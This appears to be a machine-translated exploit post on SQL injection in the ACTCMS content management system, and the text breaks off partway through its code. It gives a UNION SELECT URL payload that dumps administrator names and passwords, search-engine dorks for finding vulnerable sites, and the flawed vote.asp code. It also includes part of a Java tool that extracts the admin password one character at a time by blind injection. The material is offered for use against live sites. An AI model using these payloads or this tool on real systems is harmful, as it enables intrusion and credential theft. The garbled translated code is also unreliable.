ACTCMS Management System Injection Vulnerability

Vulnerability Description: Injection caused by User_Article.Asp and the administrator password is exposed. Usage: http: // localhost/User/User_Article.Asp? ModeID = 1 action = addsclassid =-1 '% 20 union % 20 select %, 3, 4, 5, admin_name % 2B' | '% 2 Bpassword, 8, 9, 10, 11, 12, 13,14, 15,16 ,...

Baidu or google Search Keyword: inurl: TypeClass. asp

Vulnerability description:

User_Article.Asp causes injection and the administrator password is exposed.

Usage:

Http: // localhost/User/User_Article.Asp? ModeID = 1 & action = adds & classid =-1 '% 20 union % 20 select % ,,2, 3,4, 5, admin_name % 2B' | '% 2 Bpassword, 7,8, 9, 10, 11,12, 13,14, 15,16, 17,18% 20 from % 20admin_act % 20 where % 20 '1' = '1

Baidu or gg Search Keyword: inurl: TypeClass. asp

========================================================== ======

2.

An asp cms program. There are not many users.
GOOGLE the keyword "Copyright @ 2006 www.actcms.com", not too many.

Today I read the code.
Basically all parameters are filtered out ..
But there was a small problem in voting ..

On the/plus/vote. asp page.
The Code is as follows:

ASP/Visual Basic Code
....
If request ("voted"). count = 0 then
Response. write "<script> alert ('select the voting item. '); Window. close () </script>"
Response. end
End if
For I = 1 to request ("voted"). count
Actcms. actexe ("Update vote_act set VoteNum = VoteNum + 1 where id =" & request ("voted") (I ))
Next
....
Response. Redirect "index. asp? Id = "& id &""
The id is obtained directly from the request, but it is troublesome to use it because the previous update is followed by response. redirect. In addition, this is an injection point that is not recognized by common tools. No matter what statement we construct is behind it, it will jump to the index. asp page.

The only change is that when the injection conditions we construct are correct, the number of votes increases. It is quite troublesome to use it manually. I tried some of the injection tools, such as mingxiao and pangolin, so I wrote a simple program by myself, because only JAVA, so I wrote it in JAVA .. Write is rough. In this way, it is more convenient to write. Slow speed.

The Code is as follows:

Java code
Import java. io. BufferedReader;
Import java. io. InputStreamReader;
Import java.net. URL;
Import java.net. URLConnection;
Import java. util. regex. Matcher;
Import java. util. regex. Pattern;

Public class ActCmsGetPwd {

Public static char [] arr = {'0', '1', '2', '3', '4', '5', '6', '7 ', '8 ',
'9', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'h', 'I ', 'J', 'k', 'l ',
'M', 'n', 'O', 'P', 'Q', 'R', 's', 't', 'U', 'V ', 'w', 'x', 'y ',
'Z '};

Public static String siteurl = "";
Public static int voteid = 1;
Public static String charset = "";

Public static void main (String [] args) throws Exception {
If (args. length <4 ){
System. out
. Println ("usage: java ActCmsGetPwd <siteurl> <voteid> <totalVoteNum> <charset> ");
System. out. println ("siteurl: Target Site ");
System. out. println ("voteid: voting id ");
System. out
. Println ("totalVoteNum: current number of votes. Please check plus/vote/index. asp? Id = <voteid> ");
System. out. println ("charset: ACTCMS character set used by the target site. Please check the webpage source code ");
System. out. println ("eg: java ActCmsGetPwd http://www.abc.com/1 15 gb2312 ");
Return;
}
Siteurl = args [0];
Voteid = Integer. parseInt (args [1]);
Int preVoteNum = Integer. parseInt (args [2]);
Charset = args [3];

System. out. println ("Code by Ninty, QQ 3191864 ");
System. out. print ("password is :");
For (int I = 1; I <= 16; I ++ ){
System. out. print (send (I, 0, preVoteNum ));
PreVoteNum ++;
}
System. out. println ("Done! ");
}

Public static char send (int a, int B, int preVoteNum) throws Exception {
String SQL = "% 20and % 20 (select % 20top % 201% 20mid (password," +
+ ", 1) % 20 from % 20admin_act % 20 where % 20 supertf % 20 = 1) % 20 = % 20'" + arr [B] + "'";
URL u = new URL (siteurl
+ "/Plus/vote. asp? Dopost = send & id = "+ voteid +" & ismore = 0 & voted = 3 "+ SQL );
URLConnection conn = u. openConnection ();
& N